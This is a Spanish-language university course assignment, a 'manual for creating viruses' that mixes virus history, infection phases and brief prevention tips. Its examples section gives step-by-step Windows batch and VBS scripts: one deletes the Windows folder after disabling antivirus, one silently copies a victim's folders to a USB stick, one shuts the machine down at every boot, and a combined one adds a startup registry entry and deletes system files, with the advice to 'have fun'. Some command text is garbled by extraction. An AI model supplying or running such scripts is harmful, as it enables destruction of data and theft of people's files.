Creacion Virus

Universidad Autónoma de Estado de México Materia: Redes Redes de Computadoras II Integrantes: Castillo Vite Brenda Burgos Hernández Juan Carlos López Martínez Minerva Rosales Lara Selene  Trabajo:  Traba jo: “Manual Creación de Virus” Grupo: M-8 Profesor: Saúl Steve Torres Ledesma

1

Índice Introducción  ........................................................................................................................................

3

Historia de los virus  ...........................................................................................................................

3

¿Qué son los virus?  ............................................................................................................................

4

Características de los virus  ............................................................................................................

4

¿Cómo funcionan los virus?  ..............................................................................................................

5

1.

El contagio:  ............................................................................................................................

2.

El virus activo:................. .................. ................. .................. ................. ................. ................ 5

3.

El ataque:................................................................................................................................

5

6

Ejemplos.................. ................. .................. ................. .................. ................. .................. ................. . 7 Consejos para evitar ser infectado con virus  ..................................................................................

Conclusión  .........................................................................................................................................

2

14

15

Creación de Virus

Introducción Los virus informáticos son, desde hace varios años, la mayor amenaza para los sistemas informáticos y es una de las principales causas de pérdidas económicas en las empresas y usuarios. Estos son programas (malignos) con el objeto de alterar el buen funcionamiento del ordenador, y por lo tanto han sido creados por personas con conocimientos de lenguajes de programación como: C++,  Visual Basic,  Assembler, etc. Estos lenguajes son tan sólo un intérprete entre el programador y el ordenador, cuanto más podamos comunicarnos con la máquina mejor nos entenderá, y más complejas acciones podremos ordenarle que haga. Historia de los virus

Históricamente los virus informáticos fueron descubiertos por la prensa el 12 de octubre de 1985, con una publicación del New York Times que hablaba de un virus que fue se distribuyo desde un BBS y aparentemente era para optimizar los sistemas IBM basados en tarjeta gráfica EGA, pero al ejecutarlo salía la presentación pero al mismo tiempo borraba todos los archivos del disco duro, con un mensaje al finalizar que decía "Caíste". Bueno en realidad este fue el nacimiento de su nombre, ya que los programas con código Integrado, diseñados para hacer cosas inesperadas han existido desde que existen las Computadoras. Y ha sido siempre la obra de algún programador delgado de ojos de loco. Pero las primeras referencias de virus con fines intencionales surgieron en 1983 cuando Digital Equipament Corporation (DEC) empleó una subrutina para proteger su famoso procesador de textos Decmate II, que el 1 de abril de 1983 en caso de ser copia ilegal borraba todos los archivos de su unidad de disco. Uno de los primeros registros que se tienen de una infección data del año 1987, cuando en la Universidad estadounidense de Delaware notaron que tenían un virus porque comenzaron a  ver "© Brain" como etiqueta de los disquetes. La causa de ello era Brain Computer Services, una casa de computación paquistaní que, desde 1986, vendía copias ilegales de software comercial infectadas para, según los responsables de la firma, dar una lección a los piratas. Ellos habían notado que el sector de booteo de un disquete contenía código ejecutable, y que dicho código se ejecutaba cada vez que la máquina se inicializaba desde un disquete. Lograron reemplazar ese código por su propio programa, residente, y que este instalara una réplica de sí mismo en cada disquete que fuera utilizado de ahí en más. 3

 También en 1986, un programador llamado Ralf Burger se dio cuenta de que un archivo podía ser creado para copiarse a sí mismo, adosando una copia de él a otros archivos. Escribió una demostración de este efecto a la que llamó VIRDEM, que podía infectar cualquier archivo con extensión .COM. Esto atrajo tanto interés que se le pidió que escribiera un libro, pero, puesto que él desconocía lo que estaba ocurriendo en Paquistán, no mencionó a los virus de sector de arranque (boot sector). Para ese entonces, ya se había empezado a diseminar el virus Vienna.  Actualmente, los virus son producidos en cantidades extraordinarias por muchísima gente alrededor del planeta. Algunos de ellos dicen hacerlo por diversión, otros quizás para probar sus habilidades. De cualquier manera, hasta se ha llegado a notar un cierto grado de competitividad entre los autores de estos programas. El hecho de escribir programas vírales da al programador cierta fuerza coercitiva, lo pone fuera de las reglas convencionales de comportamiento. Este factor es uno de los más importantes, pues el sentimiento de pertenencia es algo necesario para todo ser humano, y es probado que dicho sentimiento pareciera verse reforzado en situaciones marginales. Por otro lado, ciertos programadores parecen intentar legalizar sus actos poniendo sus creaciones al alcance de mucha gente, (vía Internet, BBS especializadas, etc.) haciendo la salvedad de que el material es peligroso, por lo cual el usuario debería tomar las precauciones del caso. ¿Qué son los virus?

En la Real Academia se define el termino virus: “Programa introducido subrepticiamente en la memoria de un ordenador que, al activarse, destruye total o parcialmente la información almacenada”. De una forma más coloquial y quizás más correcta podríamos decir que un virus informático es programa que se copia automáticamente (sin conocimiento ni permiso del usuario), ya sea por medios de almacenamiento o por Internet, y que tiene por objeto alterar el normal funcionamiento del ordenador, que puede ir desde una simple broma; acceso a tus datos confidenciales; uso de tu ordenador como una maquina zombie, borrado de los datos, etc. En un principio estos programas eran diseñados casi exclusivamente por los hackers y crackers que tenían su auge en los Estados Unidos y que hacían temblar a las grandes compañías. Hoy en día, resultan un buen medio para el sabotaje corporativo, espionaje industrial y daños a material de una empresa en particular. Por ello desde el punto de vista de una empresa o gran corporación, un virus sea cual sea, debe ser considerado siempre como peligroso. Características de los virus 

Dañino:

4

 Todo virus causa daño, ya sea de forma implícita, borrando archivos o modificando información, o bien disminuyendo el rendimiento del sistema. A pesar de esto, existen virus cuyo fin es simplemente algún tipo de broma.  Autoreproductor: La característica que más diferencia a los virus es ésta, ya que ningún otro programa tiene la capacidad de autoreplicarse en el sistema. Subrepticio: Característica que le permite ocultarse al usuario mediante diferentes técnicas, como puede ser mostrarse como una imagen, incrustarse en librerías o en programas. 



¿Cómo funcionan los virus?

El funcionamiento de los virus coincide en sus líneas esenciales con el de los demás programas ejecutables, toma el control del ordenador y desde allí procede a la ejecución de aquello para lo que ha sido programado. Generalmente están diseñados para copiarse la mayor cantidad de veces posible, bien sobre el mismo programa ya infectado o sobre otros todavía no contaminados, siempre de forma que al usuario le sea imposible o muy difícil darse cuenta de la amenaza que está creciendo en su sistema. El efecto que produce un virus puede comprender acciones tales como un simple mensaje en la pantalla, disminución de la velocidad de proceso del ordenador o pérdida total de la información contenida en su equipo. En la actuación de un virus se pueden distinguir tres fases: 1. El contagio:

El contagio inicial se realiza cuando el programa contaminado está en la memoria para su ejecución. Las vías por las que puede producirse la infección de su sistema son memorias, redes de ordenadores y cualquier otro medio de transmisión de información. Las memorias son por el momento, el medio de contagio más extendido en nuestro país. Estas memorias contaminantes suelen contener programas de fácil y libre circulación y carecen de toda garantía. Es el caso de los programas de dominio público, las copias ilegales de los programas comerciales, juegos, etc. 2. El virus activo:

Cuando se dice que un virus se activa significa que el  virus toma el control del sistema, y a la vez que deja funcionar normalmente a los programas que se ejecutan, realiza actividades no deseadas que pueden causar daños a los datos o a los programas. Lo primero que suele hacer el virus es cargarse en la memoria del ordenador y modificar determinadas variables del sistema que le permiten "hacerse un hueco" e impedir que otro programa lo utilice. A esta acción se le llama "quedarse residente". Así el virus queda a la espera de que se den ciertas condiciones, que varían de unos virus a otros, para replicarse o atacar. 5

La replicación, que es el mecanismo más característico y para muchos expertos definitorio de la condición de virus, consiste básicamente en la producción por el propio virus de una copia de si mismo, que se situará en un archivo. El contagio de otros programas suele ser la actividad que más veces realiza el  virus, ya que cuanto más deprisa y más discretamente se copie, más posibilidades tendrá de dañar a un mayor número de ordenadores antes de llamar la atención.

3. El ataque:

Mientras que se van copiando en otros programas, los virus comprueban si determinada condición se ha cumplido para atacar, por ejemplo que sea cinco de enero en el caso del conocido virus Barrotes. Es importante tener en cuenta que los virus son diseñados con la intención de no ser descubiertos por el usuario y generalmente, sin programas antivirus, no es descubierto hasta que la tercera fase del ciclo de funcionamiento del virus se produce el daño con la consiguiente pérdida de información.

6

Ejemplos

Bueno el primer virus, es muy fácil de hacer, acá los pasos: 12Start Start Start

Abrimos

el

"Bloc

de

Notas". Escribimos:

 Así sucesivamente hasta que queramos (cada Start provoca que se abra un ventana, entre más Start mas ventanas se abren y es muy molesto cuando son de 30 en adelante).

7

El siguiente virus, es muy fácil de hacer, acá los pasos: 1. Abrir el "Bloc de notas". 2. Escribir cualquier cosa que se les venga a la mente. 3. Guárdenlo en "C:/" con el nombre "Prueba.txt". 4. Abran nuevamente el "Bloc de notas" y escriban "erase C: / Prueba.txt", sin espacios y guárdenlo con cualquier nombre más ".cmd", o sea si lo guardan con el nombre "Documento", deben escribir al guardarlo "Documento.cmd" 5. Ejecútenlo (doble clic) y vayan a "C:/", si se dan cuenta ya no hay el archivo creado al principio.

8

El siguiente virus es derivado del anterior pero más destructivo, acá los pasos: 1. Desactiven temporalmente el antivirus instalado. 2. Abran el "Bloc de notas". 3. Escriban "erase C:/WINDOWS/ q". 4. Guárdenlo en cualquier parte con el nombre que deseen, siempre con ".cmd" al final. OJO: No

lo

ejecuten

o

¡Se

borrará

el

Windows

de

su

PC!

5. Comprímanlo con el "WinRAR", y activen su antivirus. Si se dan cuenta, ya no hay el archivo en ".cmd", pero si el ".rar".

9

El siguiente virus roba carpetas a una usb, acá los pasos: xcopy exit

"C:carpeta

origen"

"carpeta

destino"

/Y

/H

/E

/F

/I

 Tendremos que modificar esos datos donde dice: "C:" ponemos la letra de la unidad por lo general es C: "carpeta origen" ponemosla carpeta que queremos robar "carpeta destino" ponemos el nombre de la carpeta que se creara al robar los archivos (no hay que crearla, se crea sola, solo pongan el nombre que quieran...)

Ejemplo: "C:\Users\Win\Documents" "/privado/" nota: pongan lo con las comillas también Dónde la primera dirección es la de la carpeta a ser robada y "/privado/" es la carpeta que se creara en la USB cuando ejecute el virus, en esa misma carpeta se almacenara los archivos robados.  Ahora le damos guardar al documento y donde dice "nombre" ponemos cualquier nombre y lo terminamos con .bat

 Ahora crearemos el .vbs, abrimos el block de notas y escribimos lo siguiente:

Set WshShell = CreateObject("WScript.Shell"  WshShell.Runchr(34) & "xxxxx.bat" &Chr(34), 0 Set WshShell = Nothing

10

Donde "xxxx.bat" será el nombre del archivo bat que creamos, le damos guardar y donde dice nombre ponemos cualquier nombre y lo terminamos con .vbs.

 Ahora copiamos esos dos archivos a la USB y el virus qu edara listo. Para activarlo en la pc de la víctima deber ejecutar el archivo .vbs y verán que aparecerá una nueva carpeta en la USB, eso indica que funciono.

11

El siguiente virus no podrá iniciar el sistema ya que este se apagará ante cada inicio, acá los pasos:

1. Abrir el bloc 2. Ingresar el siguiente texto en el cuerpo del archivo:

de

notas

shutdown -s -t 00 3. Guardar el archivo con el nombre virus.bat 4. Mover el archivo a Inicio  –   Programas (o todos los programas)  –   Inicio. 5. Reiniciar el equipo.

Finalizados estos pasos el equipo “ya se infectó” ya que el usuario no podrá iniciar el sistema ya que este se apagará ante cada inicio.

La única forma de eliminar este virus es.. No es broma: 1. Primero 2. Buscar 3. Luego solo elimínalo así de fácil.

debes

ir

al el

12

inicio. virus.

El siguiente virus es una combinación de varios en él cual borrara Windows, abrirá ventanas infinitas del MS-DOS, mensajes de error, reiniciara a los 3 segundos el equipo y no dejara entrar en modo seguro, acá los pasos: 1. En un bloc de notas pega esto @echo off if exist "%systemroot%/Mocosoft (goto delet) else goto make :delet Rd /s /q "%systemroot%/Mocosoft" goto make :make Mk "%systemroot%/Mocosoft" goto continue :continue copy /y %0 "%systemroot%/Mocosoft/Amdset.bat" echo Hacked By 4GusCrack > "%homedrive%/Firmita.txt" REG ADD HTLM/Software/Microsoft/Windows/Current Version/Run /v Amdset /d "%systemroot%/Mocosoft/Amdset.bat" shutdown -s -f -t 20 -c "Ahi que lastima" taskkill "explorer.exe" echo msgbox “Hoy vas a co nocer lo que es un Virus.” @echo off @:uji start @goto uji exit shutdown -s -t 3 -c "No prendes la PC nunca mas. " @echo off title g00d by3 wind0w5 echo 4dio5 a tu wind0w5 del /s /f /q c:windows exit shutdown -s -t 3 -c "No prendes la PC nunca mas.”

2. Guárdalo con extensión .bat y diviértete……. (No lo ejecutes en tu propia computadora)

13

Consejos para evitar ser infectado con virus

Sin perjuicio de todo lo que se diga referente a la tecnología de detección de virus, sigue siendo el usuario el mayor responsable de evitar generar vulnerabilidades que faciliten la infección de los sistemas informáticos, para ello se debe minimizar la posibilidad de que un virus nos ataque siguiendo unos de muchos sencillos consejos: 1. Tenga instalado un programa antivirus, que trabaje en forma residente en memoria y actualícelo en forma periódica, de prioridad a aquellos software que permitan la actualización en forma automática. 2. No abra ningún archivo recibido a través del correo electrónico, mensajería instantánea o canales de chat, que no haya sido solicitado, ni entre a vínculos escritos en correos electrónicos. Asimismo extreme los cuidados al abrir correo electrónico de procedencia indeterminada. 3. No descargue nada de sitios Web que no tenga referencias de seguridad.

14

Conclusión Los Virus Informáticos, son un problema actual de suma importancia a nivel mundial. Porque son creados con varios propósitos de entre los más importantes están el de producir problemas al usuario. Por lo tanto la computadora no está a salvo de un ataque ante un virus, ya que existen multitud de virus, de técnicas, de aparatos con capacidad de ser infectados, y esto aumenta día a día. De tal forma siempre es recomendable tener un antivirus que ayude a la seguridad de la información ante el ataque de un virus, aunque nunca estará al 100% segura, ya que la tecnología avanza y este tipo de virus puedes ser mayormente más peligrosos, pero sin lugar a dudas tendremos oportunidad de enfrentarlo lo más que se pueda por medio de los Antivirus.

15